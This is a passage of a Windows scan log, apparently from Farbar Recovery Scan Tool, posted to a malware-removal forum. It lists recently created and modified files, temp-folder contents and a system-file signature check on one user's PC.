2014-10-30 20:12 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Downloads\dds.com
2014-10-30 19:31 - 2014-10-30 21:16 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 19:23 - 2014-10-30 19:23 - 00001482 _____ () C:\Users\Jack\Desktop\MBAM 10-30.txt
2014-10-30 19:07 - 2014-10-30 20:00 - 00000000 ____D () C:\Users\Jack\Desktop\mbar
2014-10-29 08:01 - 2014-10-29 08:01 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-27 02:04 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-26 18:01 - 2014-10-29 09:02 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 04:12 - 2014-02-03 21:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-10-26 04:10 - 2013-11-23 13:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2014-10-26 04:08 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 04:08 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-26 04:08 - 2013-11-26 03:16 - 03419136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2014-10-25 21:27 - 2014-10-25 21:33 - 00018973 _____ () C:\Users\Jack\Downloads\Result.txt
2014-10-25 21:17 - 2014-10-25 21:18 - 00002880 _____ () C:\Users\Jack\Downloads\FSS.txt
2014-10-25 20:48 - 2014-10-25 20:48 - 00854448 _____ () C:\Users\Jack\Desktop\SecurityCheck.exe
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList
2014-10-25 12:32 - 2014-10-25 12:32 - 00000440 _____ () C:\Users\Jack\Documents\fixlist.txt
2014-10-25 12:17 - 2014-10-25 12:17 - 00000632 _____ () C:\Users\Jack\Desktop\JRT.txt
2014-10-25 11:49 - 2014-10-25 11:49 - 00000000 ____D () C:\Windows\ERUNT
2014-10-25 08:10 - 2014-10-25 08:10 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-25 08:10 - 2014-10-25 08:10 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-25 08:10 - 2014-10-25 08:10 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00645120 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-25 08:10 - 2014-10-25 08:10 - 00610304 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-25 08:10 - 2014-10-25 08:10 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00233472 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00071680 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01247744 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01158144 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01080832 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00906240 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00604160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00364544 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00220160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-10-25 06:54 - 2014-10-25 06:54 - 00017344 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-10-25 06:54 - 2014-10-25 06:54 - 00001057 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00001045 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00000318 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-10-25 06:54 - 2014-10-25 06:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-10-25 06:53 - 2014-11-06 22:25 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\GlarySoft
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\DiskDefrag
2014-10-18 15:16 - 2014-10-18 15:16 - 00000464 __RSH () C:\ProgramData\ntuser.pol
2014-10-15 02:33 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 02:33 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 02:33 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 02:33 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 02:32 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 02:32 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 02:32 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00027648 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-15 02:32 - 2014-08-18 21:40 - 00096768 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-15 02:32 - 2014-08-18 21:40 - 00016896 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-15 02:32 - 2014-08-18 20:48 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-15 02:32 - 2014-07-16 20:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00523264 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00304128 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-15 02:32 - 2014-07-16 20:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\system32\aaclient.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00130048 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-15 02:32 - 2014-07-16 20:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-15 02:32 - 2014-07-16 20:03 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-15 02:32 - 2014-07-16 20:02 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00006144 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-15 02:32 - 2014-07-08 20:29 - 00005632 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-15 02:32 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-15 02:32 - 2014-07-06 20:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00473600 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00275968 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-15 02:32 - 2014-07-06 20:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-15 02:32 - 2014-07-06 20:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-15 02:32 - 2014-07-06 20:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlpa.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-15 02:32 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-15 02:32 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-15 02:32 - 2014-07-06 20:28 - 00593920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-15 02:32 - 2014-06-27 19:21 - 00521384 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00455752 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-15 02:32 - 2014-06-27 19:21 - 00409272 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-15 02:32 - 2014-06-18 17:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-11-09 10:10 - 2009-07-13 23:53 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-11-09 09:40 - 2013-11-25 22:47 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-11-08 21:34 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-11-08 21:34 - 2009-07-13 23:34 - 00031904 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-11-08 21:30 - 2010-11-20 16:01 - 00781298 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-08 16:26 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-11-08 16:26 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-11-08 16:22 - 2009-07-13 21:04 - 00000215 _____ () C:\Windows\system.ini
2014-11-07 01:50 - 2014-04-06 08:16 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-02 01:22 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-30 19:30 - 2014-04-06 08:13 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-30 06:24 - 2013-11-25 11:49 - 00229000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2014-10-27 04:55 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Globalization
2014-10-25 22:10 - 2010-11-20 19:38 - 00000000 ____D () C:\Windows\DigitalLocker
2014-10-25 15:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\rescache
2014-10-25 12:39 - 2011-06-02 16:34 - 00000000 ____D () C:\Windows\Panther
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-TW
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-HK
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\zh-CN
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\tr-TR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\sv-SE
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ru-RU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-PT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pt-BR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\pl-PL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nl-NL
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\nb-NO
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ko-KR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\ja-JP
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\it-IT
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\hu-HU
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fr-FR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\fi-FI
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\el-GR
2014-10-25 12:19 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\de-DE
2014-10-25 11:59 - 2014-02-20 19:10 - 00000000 ____D () C:\Windows\pss
2014-10-25 07:53 - 2014-02-20 19:45 - 00001067 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 9.lnk
2014-10-25 07:53 - 2014-02-20 19:45 - 00001055 _____ () C:\Users\Public\Desktop\TeamViewer 9.lnk
2014-10-25 07:49 - 2013-11-25 12:08 - 00000000 ___RD () C:\Users\Jack\Dropbox
2014-10-25 07:49 - 2013-11-25 12:01 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Dropbox
2014-10-25 07:48 - 2014-04-06 08:13 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2014-04-06 08:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-24 22:39 - 2013-11-25 12:14 - 00001067 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000972 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-24 22:18 - 2013-11-25 12:13 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-24 22:10 - 2014-04-26 17:44 - 00192512 _____ () C:\Users\Jack\AppData\Local\ChromeHitoryDB
2014-10-24 20:37 - 2009-07-13 21:04 - 00000505 _____ () C:\Windows\win.ini
2014-10-18 20:29 - 2009-07-13 23:53 - 00032538 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-10-18 13:59 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\system32\GroupPolicy
2014-10-16 02:33 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-10-16 02:24 - 2009-07-13 23:46 - 00001515 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2014-10-16 02:23 - 2009-07-13 23:33 - 00315464 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-16 02:22 - 2014-04-30 02:00 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-10-16 02:04 - 2013-11-25 11:58 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-16 02:02 - 2013-11-25 11:58 - 100290944 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
Some content of TEMP:
====================
C:\Users\Jack\AppData\Local\temp\Quarantine.exe
C:\Users\Jack\AppData\Local\temp\sqlite3.dll
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_12799334.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_3428f999.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_53e3e523.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_80e9a296.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_d12a4f0f.exe
C:\Users\Jack\AppData\Local\temp\UpdateFlashPlayer_ef63aed8.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-11-09 01:53
 
==================== End Of Log ============================





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users